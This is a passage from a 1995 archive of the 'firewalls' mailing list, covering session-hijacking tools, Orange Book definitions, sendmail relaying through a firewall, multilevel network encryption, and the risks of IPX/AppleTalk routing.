(8.6.9/Miles-950430-1) id MAA21015 for firewalls-outgoing; Wed, 2 Aug 1995 12:32:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20999 for ; Wed, 2 Aug 1995 12:32:49 -0700 Received: from server1.deltanet.com(199.171.190.1) by miles via smap (V1.3) id sma020993; Wed Aug 2 12:32:14 1995 Received: from delta1.deltanet.com by deltanet.com with SMTP (5.65/1.2-eef) id AA20466; Wed, 2 Aug 95 12:30:36 -0700 Date: Wed, 2 Aug 1995 12:30:35 -700 (PDT) From: Jereme Dean To: Cameron_A_P@ceo.sbic.co.za Cc: firewalls@Greatcircle.Com Subject: Re: IPWatcher In-Reply-To: <9508021235.AA00151@zork.sbic.co.za> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well ipwatcher is comercial so that stops most of the public from getting it. And the same people that made ipwatcher also made a freeware ttywatcher which applies the same principles as ipwatcher but just with tty monitoring/stealing On Wed, 2 Aug 1995 Cameron_A_P@ceo.sbic.co.za wrote: > Message: > I have come accross a package on Internet Called IPWatcher. This > package renders Firewalls and Smart Cards Useless in that it allows > the person using it to Hijack and take over an established connection. > > The URL to get more Info on this package is > http://nad.infostructure.com/watcher.html > > My Question and problem is how do you prevent this from happening. > Also are there other Hacker tools that can do this. > > -- > Andrew Cameron > Cameron_A_P@ceo.sbic.co.za > > > From firewalls-owner Wed Aug 2 13:37:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18794 for firewalls-outgoing; Wed, 2 Aug 1995 11:31:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18759 for ; Wed, 2 Aug 1995 11:31:29 -0700 Received: from dockmaster.ncsc.mil(26.1.0.172) by miles via smap (V1.3) id sma018649; Wed Aug 2 11:31:22 1995 Date: Wed, 2 Aug 95 14:25 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: the ongoing debate.. To: firewalls@GREATCIRCLE.COM Message-ID: <950802182538.038980@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Some commentary on mjr's "clarification" of "Orange Book think" and the attendant banter that has gone on for some time: > TCSEC (trusted computing security evaluation criteria) I thought it was the Trusted Computer System Evaluation Criteria. Perhaps this is a "trivial" criticism, but knowing the proper meaning of an acronym seems really basic to the consistency of your kerygma. > trusted system is [a system designed with an eye toward > the TCSEC] Try this one (not official, but reasonable, I believe): a trusted system is a computer system that has been determined, through a lengthy evaluation process, to implement specified security mechanisms (based upon DoD security policy) with a sufficient degree of strength to warrant the deployment of the system in commensurately risky data processing environments (based upon the ranges of data sensitivity and personnel trustworthiness supported in those environments). > CMW (a B1 system with B2 features) Never have I heard such a definition. The least common denominator is C2 assurance, and some A1 features are provided. > CMWs can't hit B2 because ... they don't enforce unique access > to devices What is a "unique access to a device," and whence originate these misguided pontifications that latch onto one minutia like a moray eel while glossing over the other fifty important issues? > C level systems can't keep classifications separated At least one DoD environment that I know of has used group ID mechanisms inherent in C2 systems for mandatory separation of compartmented data. One should have some experience designing, building, modeling, and/or documenting trusted systems before going off on various tangents about their ramifications. "Never did tongue tell nor ear hear aught more extraordinary than that which we pretend." -- Burton From firewalls-owner Wed Aug 2 13:55:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16498 for firewalls-outgoing; Wed, 2 Aug 1995 10:46:06 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16472 for ; Wed, 2 Aug 1995 10:46:02 -0700 Received: from intergate.jaycor.com(199.106.44.3) by miles via smap (V1.3) id sma016466; Wed Aug 2 10:45:10 1995 Received: from pan.jaycor.com (pan.jaycor.com [199.106.45.4]) by intergate.jaycor.com (8.6.12/8.6.9) with SMTP id KAA12605 for ; Wed, 2 Aug 1995 10:44:20 -0700 Message-Id: <199508021744.KAA12605@intergate.jaycor.com> X-Sender: scott@mail.jaycor.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 02 Aug 1995 10:44:52 -0700 To: Firewalls@GreatCircle.COM From: scott@jaycor.com (Scott Brehm) Subject: Passing email through a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This doesn't relate directly to firewall hardware or software, but no one is responding in comp.os.sendmail, and I know someone on this list is doing this. I am having some difficulty trying to configure my site to pass email through a firewall: Internet | ---------- | router | ---------- | ------------------------------------------ | | ------- -------- | A | | FW | ------- -------- |------------------------ -------- | B | -------- A runs primary DNS for company.com and also runs sendmail 8.6.12 and pop. It is currently configured to receive mail addressed to user@company.com and hold it for the pop users. I am adding an inside net with B using FW. Mail for users on B will normally be received by A, which will have aliases for users who actually reside on B. Mail will normally not be addressed to user@B.company.com. FW is a dual-homed host with routing turned off. It runs a secondary name server (from A), sendmail 8.6.12, and socks. I also have the TIS firewall toolkit available, but I am not running smap/smapd for the moment until I get the basic configuration worked out. B is a multiuser host which has sendmail and a bunch of users which will not have access to a pop client, and therein lies the problem. How do I configure sendmail and DNS to get mail through FW? I have three MX records: company.com IN 40 smtp.provider.net. company.com IN 30 A.company.com. B IN 50 FW I was told by HP (the vendor of B) to configure sendmail on B with a DSFW.company.com line and uncomment the Ruleset 0 line to pass unresolved SMTP addresses to the SMTP relay. When I mail to user@company.com from B I expected the mail to be sent to FW and then on to A, but instead it is timing out on a connection to smtp.provider.net. I am a little suspicous of the advise because B can obviously see the addresses outside the firewall and is trying to connect directly with those hosts. I thought of trying another MX company.com IN 50 FW.company.com but I don't care to have to wait through the time outs. I want mail to go first time from B to FW to wherever. I don't yet have the bat book, and the on-line help doesn't give any suggestions for configuring FW as a relay so I am completely in the dark here. At the moment mail addressed to B can't get through (see question 1 below). The questions: 1. How is FW supposed to be configured to accept and forward mail for B? I was told to configure FW using CWB.company.com (I ended up using Fw/etc/sendmail.cf but that made no difference other than if user happened to have an account on FW the mail was delivered to FW rather than bouncing.) 2. How is B supposed to be configured to pass _all_ non local mail to FW for relaying? Am I going to use the 'nullclient' feature and have even local mail go off to FW? If this is the solution, please describe the level 5 config format. B is an old box :-(. Thanks for your help. ----------------------------------------------------------------------- snailmail://USA/92186/CA/San_Diego/P.O.BOX_85154/JAYCOR/Scott_Brehm voice://619-535-3144 fax://619-452-2135 From firewalls-owner Wed Aug 2 13:58:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20636 for firewalls-outgoing; Wed, 2 Aug 1995 12:17:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20595 for ; Wed, 2 Aug 1995 12:17:46 -0700 Received: from utrecht.knoware.nl(193.78.120.3) by miles via smap (V1.3) id sma020577; Wed Aug 2 12:16:46 1995 Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id VAA28365; Wed, 2 Aug 1995 21:13:52 +0200 Date: Wed, 2 Aug 1995 21:13:52 +0200 Message-Id: <199508021913.VAA28365@utrecht.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) From: njb@knoware.nl (Niels Bjergstrom) Subject: Re: Multilevel systems Cc: firewalls@greatcircle.com X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett writes: >Reasonable question. The problem with a multilevel protection at the firewall >is that the external gateway is not a good place to try to separate comingled >functions e.g. HR and Finance on the same backbone. If instead the separation >exists between equally trusted/equally untrusted levels then a binary function >works, for multilevel networks the only real answer is encryption. Yes, this is a very interesting question: Should you run unsecure traffic on secure networks, should you run secure traffic on unsecured networks, and is there any advantage to doing both at the same time? So, this is not a good idea (unless using secure traffic): --------- secure net A info only | Comingled info --------[ BOX ]----- secure net B info only | --------- secure net C info only whereas this is one solution to consider: Outside --- [ext fw] - [net A] - [int fw] - [net B] - [int fw]- [net C] | | --------------------------------- Here, net C could be finance, for example. This can be considered in case you use encryption: Type A machine Type B machine Type C machine | | | Outside -- [ext fw] ------------------------------------------- | | | Type C machine Type C machine Type A machine where type Z machines can en/decrypt only traffic running on the virtual Z network. I like the virtual secure network idea, which you obviously also recommend, very much. Have you ever tried to implement this setup in real life? What's involved in terms of e.g. en/decryption overhead? The more I think about this the better I like it: Very high virtual fences with strictly controlled gates, things to which I'm quite partial :). If correctly set up and enforced this philosophy should also be able to solve the eternally discussed problem of catching vira attached to mail, because the encryption process on the internal nets can be totally centrally controlled, meaning that the only way to ex/import data is through gateways that can be secured as required. Nifty... >You mean like changing the third byte in the FBR from a 90h to "something >else" so that DOS refuses to read it ? Change "BATCOMEXE" to BBBCCCEEE ? >Wouldn't know about that 8*). A bit more elaborate, I'm afraid. Ever since I first attached a (8") floppy drive to my Rockwell M65 microcomputer in 1979 thorugh a 6522 VIA component (integrated floppy controllers were not yet available, or I couldn't aford one, I no longer recall which), and wrote a suitable file handling system to control it, I have derived a perverted pleasure from re-arranging the way info is stored on floppies :-). Incidentally, the little Rockwell computer first had a large Revox tape recorder as its mass storage device, because the Revox had a plug allowing you to control it be means of relay switches. And it had 4 kB of RAM. Later I upgraded it to 32k and wrote a full-featured floating-point math library for it. Apologize for rambling. Seems to come with age... Rgds, Niels From firewalls-owner Wed Aug 2 14:32:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27651 for firewalls-outgoing; Wed, 2 Aug 1995 14:24:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00774 for ; Tue, 1 Aug 1995 18:08:32 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma000747; Tue Aug 1 18:07:40 1995 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id LAA27563 (8.6.12/IDA-1.6); Wed, 2 Aug 1995 11:06:03 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Miles-950430-1) id LAA03134; Wed, 2 Aug 1995 11:05:53 +1000 From: Julian Assange Message-Id: <199508020105.LAA03134@suburbia.net> Subject: best-of-security To: firewalls@greatcircle.com Date: Wed, 2 Aug 1995 11:05:52 +1000 (EST) Cc: bugtraq@fc.net X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 4054 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This partially a repost. "best-of-security" had some majordomo/sendmail headaches. With some advise from Brent Chapman I believe we have ironed these out. If you have not received mail from b-o-s in the last 24 hours, then it is most likely that you are not on the list, and need to (re)subscribe. -Julian Assange. Best of all available security resources. _/_/_/ _/_/ _/_/_/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/_/ _/_/_/ Best Of Security "echo subscribe best-of-security|mail best-of-security-request@suburbia.net" REASONS FOR INCEPTION --------------------- In order to compile the average security administrator it was found that the compiler had to parse a foreboding number of exceptionally noisy and semantically-content-free data sets. This led to exceptionally high load averages and a dramatic increase in core entropy. Further, the number, names and locations of this data appears to change on an almost daily basis; requiring tedious version control on the part of the mental maintainer. OVERVIEW --------- Best-of-Security is at present an un-moderated list. That may sound strange given our stated purpose of massive entropy reduction; but because best often equates with "vital" and the moderator doesn't have an MDA habit it is important that material sent to this list be delivered to its subscribers' in as minimal period of time as is (in)humanly possible. If you find *any* information from *any* source (including other mailinglists, newsgroups, conference notes, papers, etc) that fits into one of the acceptable categories described at the end of this document then you should *immediately* send it to "best-of-security@suburbia.net". Do not try and predict whether or not someone else will send the item in question to the list in the immediate future. Unless your on a time-delayed mail vector such as polled uucp or the item has already appeared on best-of-security, mail the info to the list! Even if it is a widely deployed peice of information such as a CERT advisory the proceeding argument still applies. If the information hasn't appeared on this list yet, then SEND IT. It is far better to run the risk of minor duplication in exchange for having the information out where it is needed than act conservatively about occasional doubling up on content. We do, of course take original posts. In the famous last words of CORE DIGEST: "meat, we want meat". Consult the below lists for what we will and will not accept. WILL WILL WILL WILL WONT WONT WONT WONT 8lgm, cert, ciac, dod and other Any flames. non-vendor advisories. Any questions. Vendor advisories of security Any rumors. weaknesses in own or other products. Sigs with >2 lines of Vendor new security-product line comercial information. release or MAJOR upgrade. Minor upgrade information. Fully disclosed security weaknesses. "there is a hole in X" Exploitation details. Any advertising. Exploitation code. Subscription, unsubscription or Patch code. mailing list queries. Patch announcements. Any requests. Hard to obtain or otherwise occulted Vague or incomprehensible source code or uuencoded executables. statements of dysfuctional Conference announcements. persons. Security tools. Opinionated rantings such as Blond jokes. those on the ethics of full NEW or hard to obtain security disclose or computer hackers. documents (ascii), or pointers to Quotes from the Illiad. the location of such documents/papers. Old or otherwise well known Announcements of new security archives information or pointers to or mailinglists. that information. Human language translations of the above. Nonsense. From firewalls-owner Wed Aug 2 14:33:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19378 for firewalls-outgoing; Wed, 2 Aug 1995 11:47:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19361 for ; Wed, 2 Aug 1995 11:47:35 -0700 Received: from mercury.sun.com(192.9.25.1) by miles via smap (V1.3) id sma019356; Wed Aug 2 11:47:03 1995 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id LAA21724; Wed, 2 Aug 1995 11:45:42 -0700 Received: from olympics.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA27410; Wed, 2 Aug 1995 11:45:36 -0700 Received: by olympics.Eng.Sun.COM (5.1 03/21/95 /CRAY-5.1) id AA15687; Wed, 2 Aug 95 11:40:27 PDT Date: Wed, 2 Aug 95 11:40:27 PDT From: Brad.Powell@Eng.Sun.COM ( Brad Powell SunNetworks) Message-Id: <9508021840.AA15687@olympics.Eng.Sun.COM> To: firewalls@greatcircle.com, mjr@iwi.com Subject: Re: connectathon: BOGUS // testing methodologies Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Okay, connectathon for firewalls has pros but a lot of cons. If we are trying to improve firewall performance then why not a "peer review" -a thon instead. Vendors set up their firewall, and a group of "independent" experts audit it. By independant group I mean recognized persons with nothing to gain or loose by the audit. Non-published results, but detailed finding to the vendor of the product. Note: you don't have to have a "product" to be a vendor. If your setting up firewalls using PD tools, and selling consulting time , then you qualify as a vendor. Brad From firewalls-owner Wed Aug 2 14:40:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19208 for firewalls-outgoing; Wed, 2 Aug 1995 11:43:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19195 for ; Wed, 2 Aug 1995 11:43:31 -0700 Received: from ereapp.erenj.com(159.70.31.2) by miles via smap (V1.3) id sma019188; Wed Aug 2 11:43:21 1995 Posted-Date: Wed, 2 Aug 1995 14:40:41 -0400 From: "Bryan D. Boyle" Message-Id: <9508021440.ZM8798@maverick.erenj.com> Date: Wed, 2 Aug 1995 14:40:41 -0400 In-Reply-To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) "Re: Using multilevel systems..." (Aug 2, 11:37am) References: <9508021537.AA17110@uvs1.orl.mmc.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Subject: Re: Using multilevel systems... Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I think most managaement understanded that there is a problem. The bigger > issue is that many managers feel that they know what to do about it. Think > it was Will Rogers that said "Isn't what people don't know that is the > problem, It's what they know that just isn't so." Managers, particularly > middle managers in big corporations, seem to feel that to admit there is > something they do not know, is unadmissable. Even worse are experts (LAN > experts in particular) operating out of their field. Yeah. There are so many 'FIREWALL EXPERTS' around now that were never even in on the germinal discussions about the technology a few years ago. Notice that? But they seem to have good press agents...:) Hot topic = increase in 'experts', not necessarily an increase in knowledge. More interesting are the management types in IS that seem to pontificate about their 'firewalls, access control auditing, and personnel policies' and still don't filter users' requests for modems for their desktop pc systems so they can load up the latest diskette from AOHell and go online that way while still connected to the internal net. "it isn't really a problem", we are told. Until something happens, right? Most security policies are full of holes like that. Has to do with the old blue way of thinking: there is only one way in, so you only have to protect that one door. Technology has moved forward faster than thinking, in some areas. Most of us understand that, but management (generic term here, folks, not to denigrate any ONE segment of the IS population) is still working on their 3270 terminals on PROFS and calling that electronic mail. > > Curiously, top management, if you can ever get through to them, are usually > not a problem - guess they do not feel threatened. Until the local media is banging down their doors to get their reaction to a subsidiary being cybervandalized (had to use that term du jour, ok? ;)) > > >Note that hackers should fall into one of these categories, and firewalls > >only protect against a certain, very well bounded class of these risks. > >(a quick note: the mainframe guys DO think about this; it's the UNIX/DOS > >world that doesn't.) Hey, don't equate the unix weenies with the dos appliance users. ;) > my concept of good security - you never need to know it is there unless > something happens. And the concept of effective secure design, too, would you agree? Just some random thoughts for a hot August day. -- Bryan D. Boyle | "The real difficulty in changing any enterprise lies #include | not in developing new ideas, but in escaping from EMAIL: bdboyle@erenj.com | the old ones." --John Maynard Keynes ---------------------------------- -------------------- From firewalls-owner Wed Aug 2 15:34:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA28385 for firewalls-outgoing; Wed, 2 Aug 1995 14:32:42 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA28350 for ; Wed, 2 Aug 1995 14:32:35 -0700 Received: from slip-0-20.shore.net(198.115.177.220) by miles via smap (V1.3) id sma028312; Wed Aug 2 14:32:21 1995 Received: (from smap@localhost) by dag.wfnx.com (8.6.12/8.6.9) id RAA13485 for ; Wed, 2 Aug 1995 17:26:24 -0400 Received: from mark.wfnx.com(206.64.193.15) by dag.wfnx.com via smap (V1.3) id sma013467; Wed Aug 2 17:25:56 1995 X-Sender: saltzman@dag Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 2 Aug 1995 17:31:41 -0500 To: firewalls@greatcircle.com From: saltzman@shore.net (Mark Saltzman) Subject: appletalk and ipx dangers? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone see any danger in allowing ipx and appletalk traffic to be routed through my firewall? I have ip routing disabled for obvious reasons, but I want to allow ipx and appletalk routing through the firewall. We have a remote access server setup on the "unsafe" side of the firewall which allows users ip connectivity to get out to the internet, and appletalk and ipx to get in to the corporate network. If my internet router is not routing appletalk or ipx then I'm safe, right......? thanks for any info, -mark -- Mark Saltzman Phoenix Media/Communications Group saltzman@shore.net From firewalls-owner Wed Aug 2 15:54:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29400 for firewalls-outgoing; Wed, 2 Aug 1995 14:51:13 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29380 for ; Wed, 2 Aug 1995 14:51:09 -0700 Received: from egate1.eds.com(192.85.154.76) by miles via smap (V1.3) id sma029373; Wed Aug 2 14:51:04 1995 Received: by egate1.eds.com (hello) id RAA03947; Wed, 2 Aug 1995 17:50:06 -0400 Received: by igate1.eds.com (hello) id RAA06588; Wed, 2 Aug 1995 17:50:06 -0400 Received: from koicdu24.icdc.delcoelect.com by kocrsv01.delcoelect.com with SMTP id AA15323 (5.65c/IDA-1.5/CORE for ); Wed, 2 Aug 1995 16:50:05 -0500 Received: from localhost by koicdu24.icdc.delcoelect.com (8.6.4/16.6) id RAA17041; Wed, 2 Aug 1995 17:50:05 -0400 From: "Thomas V. Myers" Message-Id: <199508022150.RAA17041@koicdu24.icdc.delcoelect.com> Subject: Re: Multilevel systems To: njb@knoware.nl (Niels Bjergstrom) Date: Wed, 2 Aug 1995 16:50:03 -0400 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <199508021913.VAA28365@utrecht.knoware.nl> from "Niels Bjergstrom" at Aug 2, 95 09:13:52 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2604 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk njb@knoware.nl (Niels Bjergstrom) writes: > Yes, this is a very interesting question: Should you run unsecure traffic on > secure networks, should you run secure traffic on unsecured networks, and is > there any advantage to doing both at the same time? > > So, this is not a good idea (unless using secure traffic): > > --------- secure net A info only > | > Comingled info --------[ BOX ]----- secure net B info only > | > --------- secure net C info only > > whereas this is one solution to consider: > > Outside --- [ext fw] - [net A] - [int fw] - [net B] - [int fw]- [net C] > | | > --------------------------------- > > Here, net C could be finance, for example. > > This can be considered in case you use encryption: > > Type A machine Type B machine Type C machine > | | | > Outside -- [ext fw] ------------------------------------------- > | | | > Type C machine Type C machine Type A machine > > where type Z machines can en/decrypt only traffic running on the virtual Z > network. > > I like the virtual secure network idea, which you obviously also recommend, > very much. Have you ever tried to implement this setup in real life? What's > involved in terms of e.g. en/decryption overhead? The more I think about > this the better I like it: Very high virtual fences with strictly controlled > gates, things to which I'm quite partial :). If correctly set up and > enforced this philosophy should also be able to solve the eternally > discussed problem of catching vira attached to mail, because the encryption > process on the internal nets can be totally centrally controlled, meaning > that the only way to ex/import data is through gateways that can be secured > as required. Nifty... Is this type of network encryption supported by the Hughes Network Systems 'NetLock' product? It would seem that you need unique public/private key pairs for each machine and that each machine on the 'virtual Z' network would have to have the public key for every other machine on that virtual network. Distributing these keys in the first place (when the network is still unsecure) would seem to be a nightmare (sniffing-spoofing, etc). (amateur opinion, use with caution), Tom -- Tom Myers : tvmyers@icdc.delcoelect.com From firewalls-owner Wed Aug 2 16:01:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02881 for firewalls-outgoing; Wed, 2 Aug 1995 15:43:09 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02845 for ; Wed, 2 Aug 1995 15:43:04 -0700 From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com Received: from netcom11.netcom.com(192.100.81.121) by miles via smap (V1.3) id sma002824; Wed Aug 2 15:42:23 1995 Received: from njcorp.akbs.com by netcom11.netcom.com (8.6.12/Netcom) id PAA07352; Wed, 2 Aug 1995 15:39:23 -0700 Received: from cc:Mail by njcorp.akbs.com id AA807414114; Wed, 02 Aug 95 18:41:00 EST Date: Wed, 02 Aug 95 18:41:00 EST Encoding: 21 Text Message-Id: <9507028074.AA807414114@njcorp.akbs.com> To: firewalls@greatcircle.com Subject: Subnet Mask for Firewall Setup Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am in the process to setup our internet firewall. The diagram is looks like this: Internet <-----> Router <------> Web, ftp server <------> firewall <------> Internal LAN. The firewall itself I will use Livingston Firewall IRX. To setup the firewall, I was told by our service provider NetCom that we need to split our class C network further, i.e. two subnets. One will be external LAN (Web, ftp server). One is internal LAN. This is the way that router routes the packets according to tech support of NetCom. Is it necessary to split our network because we will loose half address for our users (on the external LAN, they are only several machines)? Thanks in advance. Ruiyuan Jiang (908) 287-2236 System Administrator FAX (908) 287-3193 ADVANTAGE kbs, Inc. rjiang@akbs.com HP-UX Business Partner Lotus Notes Business Partner From firewalls-owner Wed Aug 2 16:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA03972 for firewalls-outgoing; Wed, 2 Aug 1995 15:56:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA03878 for ; Wed, 2 Aug 1995 15:56:45 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma003863; Wed Aug 2 15:56:17 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id PAA15786; Wed, 2 Aug 1995 15:50:41 -0700 Received: from unknown(204.160.241.205) by mycroft via smap (V1.3mjr) id sma015780; Wed Aug 2 15:50:35 1995 Received: from localhost.ipsilon.com (localhost.ipsilon.com [127.0.0.1]) by servo.ipsilon.com (8.6.11/8.6.10) with SMTP id PAA04995; Wed, 2 Aug 1995 15:54:25 -0700 Message-Id: <199508022254.PAA04995@servo.ipsilon.com> X-Authentication-Warning: servo.ipsilon.com: Host localhost.ipsilon.com didn't use HELO protocol X-Mailer: exmh version 1.6beta 3/23/95 To: Marcus J Ranum cc: firewalls@greatcircle.com, craiga@Ipsilon.COM Subject: Re: connectathon: BOGUS // testing methodologies In-reply-to: Your message of "Wed, 02 Aug 1995 10:50:15 EDT." <9508021450.AA05935@tis.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 02 Aug 1995 15:54:19 -0700 From: Craig Anderson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > A connectathon will simply invite a large amount of such > bogusness to happen over a short time in a small place. > > mjr. My purpose in suggesting a Connectathon-like event was to try and remove some of the FUD from this industry (but then, that's what security is all about, right? :-). FUD hurts everyone. It's too easy for anyone to sell FUD and do nothing for the customer. The industry must have some form of accountability. Some measure of quality and objectivity. Otherwise, how many of you consultants want to start paying for malpractice insurance? Maybe the firewall vendor audits and warrantees the installation of it's firewall, or leases the firewall to the customer and provides operational support for it (or through the ISP). Come on guys, you can't sell FUD forever. How do I, as a customer, know what I'm paying for? What do you say for yourselves vendors? Craig Anderson From firewalls-owner Wed Aug 2 18:39:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA09601 for firewalls-outgoing; Wed, 2 Aug 1995 18:17:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA09593 for ; Wed, 2 Aug 1995 18:17:45 -0700 Received: from comm.cpd.tandem.com(130.252.12.3) by miles via smap (V1.3) id sma009590; Wed Aug 2 18:17:34 1995 Received: by comm.tandem.com (4.13/4.5) id AA22329; 2 Aug 95 18:16:36 +1700 Date: 2 Aug 95 14:33:00 +1700 From: PAWLUK_JEAN@tandem.com Message-Id: <199508021816.AA22329@comm.tandem.com> To: firewalls@greatcircle.com Subject: Where are the known "den of thieves" sites ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Being a newbie I wondered who are these known sites ? Who knows about them ? Where can I get that info ? I've never seen an alert that says such and such site or ip address is a known source of trouble so who is passing this info along ? Are there lists ? Just Curious From firewalls-owner Wed Aug 2 19:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA09301 for firewalls-outgoing; Wed, 2 Aug 1995 18:03:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA09285 for ; Wed, 2 Aug 1995 18:03:45 -0700 Received: from unknown(203.7.206.35) by miles via smap (V1.3) id sma009273; Wed Aug 2 18:02:46 1995 Received: by smokey.bbb.com.au idKAA15465; Thu, 3 Aug 1995 10:45:47 +1000 Received: from msmail.bbb.com(196.150.42.3) by smokey via smap (V1.3) id sma015457; Thu Aug 3 10:45:19 1995 Message-ID: Date: 3 Aug 1995 11:05:26 +1000 From: "marc" Subject: RE: appletalk and ipx dangers? To: firewalls@GreatCircle.COM, "Mark Saltzman" X-Mailer: Mail*Link SMTP/MS 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Watch out for IPGATEWAYs. If you run MacIP encapsulation or IPX encapsulation on that access server, you will effectively be bypassing any firewalling of IP. Unscreened IP packets can then pass into your corporate net using the other protocols as transport. Cheers, Marc Bailey _______________________________________________________________________________ From: Mark Saltzman on Thu, 3 Aug, 1995 9:03 AM Subject: appletalk and ipx dangers? To: firewalls@GreatCircle.COM Does anyone see any danger in allowing ipx and appletalk traffic to be routed through my firewall? I have ip routing disabled for obvious reasons, but I want to allow ipx and appletalk routing through the firewall. We have a remote access server setup on the "unsafe" side of the firewall which allows users ip connectivity to get out to the internet, and appletalk and ipx to get in to the corporate network. If my internet router is not routing appletalk or ipx then I'm safe, right......? thanks for any info, -mark -- Mark Saltzman Phoenix Media/Communications Group saltzman@shore.net ------------------ RFC822 Header Follows ------------------ Received: by msmail.bbb.com with SMTP;3 Aug 1995 09:03:33 +1000 Received: by smokey.bbb.com.au idIAA15172; Thu, 3 Aug 1995 08:37:47 +1000 Received: from phantom.bbb.com.au(203.7.206.36) by smokey via smap (V1.3) id sma015170; Thu Aug 3 08:37:27 1995 Received: by phantom.bbb.com.au idIAA02249; Thu, 3 Aug 1995 08:46:22 -0700 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQzbcl00315; Wed, 2 Aug 1995 18:53:10 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA28385 for firewalls-outgoing; Wed, 2 Aug 1995 14:32:42 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA28350 for ; Wed, 2 Aug 1995 14:32:35 -0700 Received: from slip-0-20.shore.net(198.115.177.220) by miles via smap (V1.3) id sma028312; 